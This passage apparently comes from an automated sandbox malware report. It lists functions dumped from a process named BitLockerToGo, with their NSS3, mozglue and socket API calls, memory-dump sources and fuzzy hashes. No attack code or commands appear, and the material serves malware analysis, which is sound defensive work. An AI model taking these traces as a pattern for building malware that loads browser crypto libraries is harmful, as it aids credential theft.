                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB5CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB5CDA5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB5CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB5CDB8
                                                                                                                                                                                                                                                                                                                    • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CB5CCB5
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(6CBF14F4,6CBF02AC,00000090), ref: 6CB5CCD3
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(6CBF1588,6CBF02AC,00000090), ref: 6CB5CD2B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA79AC0: socket.WSOCK32(?,00000017,6CA799BE), ref: 6CA79AE6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA79AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CA799BE), ref: 6CA79AFC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA80590: closesocket.WSOCK32(6CA79A8F,?,?,6CA79A8F,00000000), ref: 6CA80597
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                                                                                                    • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                                                                                                    • API String ID: 1231378898-412307543
                                                                                                                                                                                                                                                                                                                    • Opcode ID: cfa92acc2d852307a02d04a7d90d6d63fa433fd679e69393210d256aaacaa7d1
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a21dec88f2b5254a7e3f886b7619dbccf6e4dae3314e4fb9edd22136d19858e9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfa92acc2d852307a02d04a7d90d6d63fa433fd679e69393210d256aaacaa7d1
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E1196F5B042C05FDB019FAAAC067567AB8D356318F181829E46ACFF41E771CC498BE2
                                                                                                                                                                                                                                                                                                                    Function 6C9C0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9C0CD5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C9AF9A7
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9C0D40
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C9C0DCB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C995EDB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: memset.VCRUNTIME140(6C9D7765,000000E5,55CCCCCC), ref: 6C995F27
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C995E90: LeaveCriticalSection.KERNEL32(?), ref: 6C995FB2
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C9C0DDD
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C9C0DF2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4069420150-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f2d4750cf7124fbe3b5fdba98d5f896dbe4dff6972a17978fb90908f46b8c0c5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5c60e7d446cc6e3487f48c12ed59ea9d03e078acd80975e5fc5895631fff4727
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2d4750cf7124fbe3b5fdba98d5f896dbe4dff6972a17978fb90908f46b8c0c5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A4106B1A087809BD320CF29C04079AFBE5BFA9754F109A2EE8E887710D770D545CB83
                                                                                                                                                                                                                                                                                                                    Function 6C9CCCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C9BDA31,00100000,?,?,00000000,?), ref: 6C9CCDA4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C98CA10: malloc.MOZGLUE(?), ref: 6C98CA26
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9CD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C9CCDBA,00100000,?,00000000,?,6C9BDA31,00100000,?,?,00000000,?), ref: 6C9CD158
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9CD130: InitializeConditionVariable.KERNEL32(00000098,?,6C9CCDBA,00100000,?,00000000,?,6C9BDA31,00100000,?,?,00000000,?), ref: 6C9CD177
                                                                                                                                                                                                                                                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C9BDA31,00100000,?,?,00000000,?), ref: 6C9CCDC4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9C7480: ReleaseSRWLockExclusive.KERNEL32(?,6C9D15FC,?,?,?,?,6C9D15FC,?), ref: 6C9C74EB
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C9BDA31,00100000,?,?,00000000,?), ref: 6C9CCECC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C98CA10: mozalloc_abort.MOZGLUE(?), ref: 6C98CAA2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9BCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C9CCEEA,?,?,?,?,00000000,?,6C9BDA31,00100000,?,?,00000000), ref: 6C9BCB57
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9BCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C9BCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C9CCEEA,?,?), ref: 6C9BCBAF
                                                                                                                                                                                                                                                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C9BDA31,00100000,?,?,00000000,?), ref: 6C9CD058
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 861561044-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f533a351436a33a8d27e13ffe97990668ece6bf81c12864a0629cc739ba4c293
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 51e6b50d797dc3cc43382670e4bc6def63179e8b94e899902ce35da91d89d1c0
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f533a351436a33a8d27e13ffe97990668ece6bf81c12864a0629cc739ba4c293
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3D16E71B04B06DFD708CF28C4807A9B7E1BF99308F05866DD85987752EB31E965CB82
                                                                                                                                                                                                                                                                                                                    Function 6C995C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6C995D40
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FF688), ref: 6C995D67
                                                                                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C995DB4
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FF688), ref: 6C995DED
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 557828605-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2dc2bac017ab47f9519fcc8f7825f2faf9a37a5f6cb887eb9b89b970949fa9c1
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2f074c44e8672181cc98172e460f8abe21ca34044700b7da729b45fa9723b8b2
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dc2bac017ab47f9519fcc8f7825f2faf9a37a5f6cb887eb9b89b970949fa9c1
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59517F71E041598FCF08CFA8D854ABFBBB2FF95318F298619C821A7750DB31A945CB90
                                                                                                                                                                                                                                                                                                                    Function 6C97CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C97CEBD
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C97CEF5
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C97CF4E
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                                    • API String ID: 438689982-4108050209
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 77b8501866e7952235f044416aa32153e6a19e8713015ab1048f5dc218c346b3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5fe912b11ae423d23500783942404a00769b0699653ab192f35eda0b3572c4d4
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77b8501866e7952235f044416aa32153e6a19e8713015ab1048f5dc218c346b3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2051F075A0425A8FCB10CF18C890AAABBB5FFA9300F198599D8595F752D731ED06CBE0
                                                                                                                                                                                                                                                                                                                    Function 6CA96C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA96C8D
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA96CA9
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CA96CC0
                                                                                                                                                                                                                                                                                                                    • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CBB8FE0), ref: 6CA96CFE
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2370200771-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3e8bb38215471bd40053291b554964cfceabb5dfd5153727afdb4c382b8e4404
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5ebfdcbe916258f1c13c15a66bd121a99f9184f6266bf30407127830b6b294c8
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e8bb38215471bd40053291b554964cfceabb5dfd5153727afdb4c382b8e4404
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B33181B5A002169FDB08CF65C892ABFBBF5EF45248B14442DE915E7710EB319946CBE0
                                                                                                                                                                                                                                                                                                                    Function 6C9B6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C9B82BC,?,?), ref: 6C9B649B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C98CA10: malloc.MOZGLUE(?), ref: 6C98CA26
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9B64A9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AFA80: GetCurrentThreadId.KERNEL32 ref: 6C9AFA8D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AFA80: AcquireSRWLockExclusive.KERNEL32(6C9FF448), ref: 6C9AFA99
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9B653F
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C9B655A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3596744550-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 918f7609503181ee6cd6e4662ffb1f86f5bf362fa792a595e5e18de6dcac8d15
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 67ad384c2f63cfd14f4216b578e6e312960a4ee7fc91be9312a5a075e9c25911
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 918f7609503181ee6cd6e4662ffb1f86f5bf362fa792a595e5e18de6dcac8d15
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF3161B5A04705AFD704CF14D88469FBBF4BF99314F10442EE85A97741DB70E919CB92
                                                                                                                                                                                                                                                                                                                    Function 6CB06DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_MillisecondsToInterval.NSS3(?), ref: 6CB06E36
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB06E57
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • PR_MillisecondsToInterval.NSS3(?), ref: 6CB06E7D
                                                                                                                                                                                                                                                                                                                    • PR_MillisecondsToInterval.NSS3(?), ref: 6CB06EAA
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3163584228-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 653ee00d6b6909d4c6631ed49020a8cbe2d8bda8030db725c1e40b67e74d0c48
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 051e956764533fd6f34cae3790feb6d3a2313546c00628705beece21e612cd26
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 653ee00d6b6909d4c6631ed49020a8cbe2d8bda8030db725c1e40b67e74d0c48
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2318171710792EEDB145F34DD043AABBA4EB0135AF10063CDC99D6A90EB3069D9CB92
                                                                                                                                                                                                                                                                                                                    Function 6CB02DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaMark_Util.NSS3(?), ref: 6CB02E08
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: TlsGetValue.KERNEL32 ref: 6CAF14E0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: EnterCriticalSection.KERNEL32 ref: 6CAF14F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: PR_Unlock.NSS3 ref: 6CAF150D
                                                                                                                                                                                                                                                                                                                    • PORT_NewArena_Util.NSS3(00000400), ref: 6CB02E1C
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CB02E3B
                                                                                                                                                                                                                                                                                                                    • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB02E95
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA988A4,00000000,00000000), ref: 6CAF1228
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CAF1238
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CA988A4,00000000,00000000), ref: 6CAF124B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0,00000000,00000000,00000000,?,6CA988A4,00000000,00000000), ref: 6CAF125D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CAF126F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CAF1280
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CAF128E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CAF129A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CAF12A1
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1441289343-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a85e4ed7b4248596375b316110e9c132a52d01bb3a2b6cc4ebfb79dd91d35d52
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
